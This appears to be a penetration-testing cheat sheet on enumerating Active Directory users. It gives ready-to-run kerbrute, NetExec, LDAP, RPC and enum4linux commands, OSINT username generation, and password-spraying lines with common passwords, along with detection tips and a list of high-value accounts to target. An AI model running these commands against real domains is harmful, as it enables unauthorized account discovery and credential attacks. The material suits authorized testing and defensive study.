Active Directory User Enumeration Enumerate domain users to build target lists for password spraying and identify high-value accounts.
Quick Reference kerbrute userenum -d domain.local --dc 10.10.10.10 users.txt nxc smb 10.10.10.10 -u '' -p '' --users ldapsearch -h 10.10.10.10 -x -b "DC=domain,DC=local" -s sub "(&(objectclass=user))" sAMAccountName | grep sAMAccountName
Kerbrute User Enumeration kerbrute userenum -d domain.local --dc 10.10.10.10 users.txt kerbrute userenum -d domain.local --dc 10.10.10.10 users.txt -o valid_users.txt kerbrute userenum -d domain.local --dc 10.10.10.10 users.txt -v kerbrute userenum -d domain.local --dc 10.10.10.10,10.10.10.11 users.txt
NetExec User Enumeration nxc smb 10.10.10.10 -u '' -p '' --users nxc smb 10.10.10.10 -u username -p password --users nxc smb 10.10.10.10 -u '' -p '' --users | awk '{print $5}' > users.txt cat users.txt | cut -d '\' -f 2 > users_clean.txt
LDAP Enumeration Anonymous LDAP Bind ldapsearch -h 10.10.10.10 -x -s base namingcontexts ldapsearch -h 10.10.10.10 -x -b "DC=domain,DC=local" -s sub "(&(objectclass=user))" sAMAccountName | grep sAMAccountName | awk '{print $2}' > users.txt ldapsearch -h 10.10.10.10 -x -b "DC=domain,DC=local" -s sub "(&(objectclass=people))" sAMAccountName | grep sAMAccountName | awk '{print $2}' > users.txt ldapsearch -h 10.10.10.10 -x -b "DC=domain,DC=local" -s sub "(&(objectclass=user))" sAMAccountName userPrincipalName description
Windapsearch windapsearch --dc-ip 10.10.10.10 -u "" -U windapsearch --dc-ip 10.10.10.10 -u username -p password -U windapsearch --dc-ip 10.10.10.10 -u username -p password --da windapsearch --dc-ip 10.10.10.10 -u "" -U > users.txt
RPC Enumeration rpcclient -U "" -N 10.10.10.10 rpcclient $> enumdomusers rpcclient $> querydominfo rpcclient $> getdompwinfo rpcclient $> queryuser 0x457
Enum4linux enum4linux -a 10.10.10.10 enum4linux -U 10.10.10.10 enum4linux -U 10.10.10.10 | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"
Username Generation from OSINT Username-Anarchy username-anarchy -i names.txt > usernames.txt
LinkedIn2Username python3 linkedin2username.py company_name python3 linkedin2username.py company_name -f '{first}.{last}'
Validating Users With Kerbrute kerbrute userenum -d domain.local --dc 10.10.10.10 generated_users.txt -o valid_users.txt
With NetExec nxc smb 10.10.10.10 -u users.txt -p 'Password123!' --continue-on-success | grep '[+]' nxc smb 10.10.10.10 -u users.txt -p passwords.txt --no-bruteforce
Common Workflows Workflow 1: Anonymous Enumeration ldapsearch -h 10.10.10.10 -x -b "DC=domain,DC=local" -s sub "(&(objectclass=user))" sAMAccountName | grep sAMAccountName | awk '{print $2}' > users.txt nxc smb 10.10.10.10 -u '' -p '' --users | awk '{print $5}' | cut -d '\' -f 2 > users.txt rpcclient -U "" -N 10.10.10.10 rpcclient $> enumdomusers
Workflow 2: OSINT-Based Enumeration username-anarchy -i names.txt > usernames.txt kerbrute userenum -d domain.local --dc 10.10.10.10 usernames.txt -o valid_users.txt nxc smb 10.10.10.10 -u valid_users.txt -p 'Welcome1!' --continue-on-success
Notes Kerbrute Advantages:
Fast (can test 48,000+ usernames in seconds)
Uses Kerberos pre-authentication
Less noisy than SMB/LDAP
No account lockout risk
Works without credentials
Detection:
Kerbrute generates Event ID 4768 (Kerberos TGT requested):
Enable Kerberos event logging via Group Policy
Monitor for influx of 4768 events
Look for failed pre-authentication attempts
Unusual source IPs requesting TGTs
Common Username Formats:
firstname.lastname (john.smith)
firstinitiallastname (jsmith)
lastnamefirstinitial (smithj)
firstname_lastname (john_smith)
firstname (john)
lastname (smith)
LDAP Anonymous Bind:
Allows unauthenticated queries to LDAP:
Often misconfigured
Can enumerate users, groups, computers
Should be disabled in secure environments
Null Session Enumeration:
SMB null sessions allow anonymous access:
Legacy feature for backward compatibility
Often disabled on modern systems
Can enumerate users, shares, policies
Best Practices:
Start with anonymous methods (LDAP, SMB null)
Use Kerbrute for validation (fast and stealthy)
Generate usernames from OSINT if anonymous fails
Test common username formats
Document all discovered users
Identify high-value accounts (admin, service accounts)
High-Value Accounts to Look For:
Domain Admins
Enterprise Admins
Service accounts (SQL, Exchange, etc.)
Accounts with SPNs (Kerberoastable)
Accounts with adminCount=1
Accounts with password never expires
Accounts with pre-auth disabled (ASREP roastable)
Tools Comparison:
Kerbrute : Fastest, most stealthy, Kerberos-basedNetExec : Multi-protocol, good for authenticated enumLDAP : Most detailed info, requires anonymous bindRPC : Legacy, often works when others failEnum4linux : All-in-one, noisy but comprehensive
Filtering Results:
grep -v '\$' users.txt > users_no_machines.txt grep -v -i 'guest' users.txt > users_no_guest.txt ldapsearch -h 10.10.10.10 -x -b "DC=domain,DC=local" "(&(objectclass=user)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))" sAMAccountName
Common Ports Used:
Tool
Ports
Kerbrute
88/TCP (Kerberos)
LDAP
389/TCP, 636/TCP (LDAPS)
SMB
445/TCP, 139/TCP
RPC
135/TCP, 49152-65535/TCP
NetBIOS
137/UDP, 138/UDP